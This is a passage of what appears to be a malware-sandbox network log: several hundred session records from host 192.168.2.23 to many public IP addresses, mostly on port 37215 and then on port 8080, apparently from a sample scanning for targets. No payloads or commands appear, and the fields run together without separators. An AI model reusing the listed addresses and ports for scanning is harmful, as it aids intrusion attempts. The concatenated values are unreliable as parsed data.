                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5226192.168.2.235387641.187.90.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5227192.168.2.233644041.62.61.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5228192.168.2.2346170197.60.53.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5229192.168.2.234581841.222.203.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5230192.168.2.2339630157.154.232.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5231192.168.2.235476441.198.189.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5232192.168.2.2340578157.119.151.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5233192.168.2.2340748197.228.36.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5234192.168.2.2340454197.4.108.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5235192.168.2.234767858.162.234.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5236192.168.2.2343626197.241.33.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5237192.168.2.2350574157.139.75.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5238192.168.2.2354198157.164.52.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5239192.168.2.2357970157.23.229.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5240192.168.2.2338326157.101.169.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5241192.168.2.2334310197.45.222.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5242192.168.2.2334962157.59.117.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5243192.168.2.234916641.52.154.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5244192.168.2.2351516197.32.41.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5245192.168.2.2357294157.223.30.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5246192.168.2.2359560197.200.62.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5247192.168.2.235007234.7.4.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5248192.168.2.2340826162.25.222.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5249192.168.2.2333966157.64.190.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5250192.168.2.2348062157.163.5.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5251192.168.2.234413441.212.102.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5252192.168.2.234615441.130.35.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5253192.168.2.2333502197.131.64.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5254192.168.2.2333256197.67.151.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5255192.168.2.234683041.214.11.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5256192.168.2.2351384101.171.139.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5257192.168.2.2354368197.239.189.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5258192.168.2.2344962184.123.124.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5259192.168.2.2353104197.1.112.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5260192.168.2.235746441.57.168.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5261192.168.2.2353280173.146.71.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5262192.168.2.2334386157.96.81.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5263192.168.2.235304241.40.49.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5264192.168.2.235563841.168.41.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5265192.168.2.2340348157.1.38.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5266192.168.2.233992441.130.186.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5267192.168.2.2349672197.5.30.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5268192.168.2.2352650157.85.143.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5269192.168.2.235772241.184.224.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5270192.168.2.233931241.1.144.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5271192.168.2.235709241.90.20.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5272192.168.2.23583144.130.231.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5273192.168.2.235436036.7.156.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5274192.168.2.2359032157.21.113.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5275192.168.2.235239441.218.92.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5276192.168.2.233881032.158.149.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5277192.168.2.2353900197.105.217.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5278192.168.2.2350674123.67.208.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5279192.168.2.2356516157.174.160.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5280192.168.2.234343679.117.186.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5281192.168.2.2351322197.218.28.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5282192.168.2.235178213.205.171.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5283192.168.2.235105441.236.73.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5284192.168.2.2348852157.222.234.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5285192.168.2.235981041.183.243.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5286192.168.2.2346034157.124.119.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5287192.168.2.2354834197.58.66.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5288192.168.2.2339162157.80.238.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5289192.168.2.233332641.166.233.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5290192.168.2.2359126197.79.10.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5291192.168.2.2337548144.55.5.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5292192.168.2.235230441.3.150.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5293192.168.2.2358844222.41.249.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5294192.168.2.2333958157.83.143.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5295192.168.2.2333266197.191.114.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5296192.168.2.233462441.116.233.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5297192.168.2.233568041.79.149.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5298192.168.2.234539241.137.4.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5299192.168.2.2341712197.166.181.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5300192.168.2.2348296197.51.61.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5301192.168.2.2345198157.212.79.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5302192.168.2.233902817.115.27.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5303192.168.2.235548887.145.113.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5304192.168.2.2345304197.28.162.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5305192.168.2.234143841.12.40.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5306192.168.2.2333518157.7.31.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5307192.168.2.2349484197.51.172.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5308192.168.2.235607641.222.213.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5309192.168.2.234465441.174.135.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5310192.168.2.2336864197.64.109.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5311192.168.2.234518841.3.15.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5312192.168.2.2358362157.90.97.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5313192.168.2.2360062157.6.236.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5314192.168.2.2336838157.37.39.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5315192.168.2.235235876.44.246.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5316192.168.2.233467017.222.180.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5317192.168.2.2353198197.1.189.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5318192.168.2.2339610157.134.125.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5319192.168.2.2344366197.250.20.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5320192.168.2.235694840.176.18.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5321192.168.2.234421040.178.29.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5322192.168.2.235853641.7.114.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5323192.168.2.2345180157.146.19.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5324192.168.2.2355852197.208.75.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5325192.168.2.233647441.62.85.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5326192.168.2.2346914157.80.66.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5327192.168.2.2344188157.169.30.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5328192.168.2.2357540157.171.136.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5329192.168.2.2334890197.82.46.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5330192.168.2.2337424197.82.30.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5331192.168.2.2338298157.26.192.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5332192.168.2.2336862197.23.29.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5333192.168.2.2341852157.10.160.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5334192.168.2.234526041.190.178.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5335192.168.2.2356620157.83.181.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5336192.168.2.234266241.126.248.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5337192.168.2.235078645.128.11.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5338192.168.2.2339080157.26.172.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5339192.168.2.2355618157.165.3.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5340192.168.2.233913641.155.138.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5341192.168.2.2350774197.11.177.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5342192.168.2.235691841.173.220.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5343192.168.2.2360976157.187.103.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5344192.168.2.2358826100.49.142.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5345192.168.2.2339066197.84.168.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5346192.168.2.2348210157.26.53.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5347192.168.2.2352396157.66.56.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5348192.168.2.235925236.115.243.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5349192.168.2.2342854202.45.120.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5350192.168.2.2345576183.173.97.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5351192.168.2.233825281.156.21.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5352192.168.2.2353446136.115.187.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5353192.168.2.234930294.204.52.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5354192.168.2.2341658154.97.152.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5355192.168.2.2354028220.187.70.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5356192.168.2.236076242.183.144.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5357192.168.2.233466247.46.53.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5358192.168.2.2345880149.83.45.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5359192.168.2.235510042.246.36.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5360192.168.2.2352622190.137.68.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5361192.168.2.2359354123.183.104.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5362192.168.2.2336912223.161.151.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5363192.168.2.236042436.149.65.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5364192.168.2.2358042166.48.214.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5365192.168.2.234904051.111.196.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5366192.168.2.2355122144.207.72.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5367192.168.2.2358040193.50.181.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5368192.168.2.233855891.108.195.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5369192.168.2.2350422138.161.19.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5370192.168.2.235498869.122.164.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5371192.168.2.2355654128.204.32.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5372192.168.2.234388488.200.11.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5373192.168.2.234451638.162.21.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5374192.168.2.2337998223.181.243.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5375192.168.2.2353592198.223.169.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5376192.168.2.2352234109.118.172.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5377192.168.2.233282861.129.233.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5378192.168.2.2339612150.203.39.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5379192.168.2.2339716188.201.19.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5380192.168.2.2338248193.212.163.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5381192.168.2.234337885.88.172.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5382192.168.2.234232869.40.198.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5383192.168.2.2338612188.166.84.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5384192.168.2.2341764218.252.222.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5385192.168.2.233352643.137.38.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5386192.168.2.234798080.49.135.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5387192.168.2.2350726153.191.37.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5388192.168.2.2336566151.90.241.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5389192.168.2.2352328114.110.14.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5390192.168.2.2356406125.246.173.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5391192.168.2.2353980157.187.45.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5392192.168.2.2352950196.53.243.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5393192.168.2.2347666211.233.210.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5394192.168.2.2346750160.127.34.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5395192.168.2.2338168174.76.76.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5396192.168.2.2335318181.253.89.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5397192.168.2.2345046146.174.176.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5398192.168.2.234097071.97.120.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5399192.168.2.2347702167.229.69.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5400192.168.2.2344732187.14.210.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5401192.168.2.23526282.115.54.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5402192.168.2.234393661.227.138.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5403192.168.2.2337410157.199.230.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5404192.168.2.235158212.117.177.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5405192.168.2.235871691.65.8.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5406192.168.2.234041670.6.227.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5407192.168.2.2357486106.106.252.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5408192.168.2.2353000138.237.88.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5409192.168.2.2357800216.129.13.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5410192.168.2.2339020197.252.235.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5411192.168.2.234397459.83.185.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5412192.168.2.234966688.212.0.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5413192.168.2.2353860201.81.50.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5414192.168.2.2358558201.139.134.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5415192.168.2.235245660.64.48.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5416192.168.2.2341320120.122.198.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5417192.168.2.2340536129.140.128.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5418192.168.2.23442165.26.106.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5419192.168.2.2359354178.65.121.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5420192.168.2.234554438.187.125.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5421192.168.2.234387437.12.149.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5422192.168.2.2341532108.152.200.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5423192.168.2.2343010103.247.125.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5424192.168.2.2343292132.44.203.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5425192.168.2.233829487.205.140.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5426192.168.2.2348304131.12.136.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5427192.168.2.233555213.243.56.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5428192.168.2.235322059.56.29.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5429192.168.2.234109872.5.28.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5430192.168.2.2340688187.202.19.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5431192.168.2.2349078101.181.189.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5432192.168.2.233627277.206.132.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5433192.168.2.2355556142.247.126.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5434192.168.2.2349080213.160.45.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
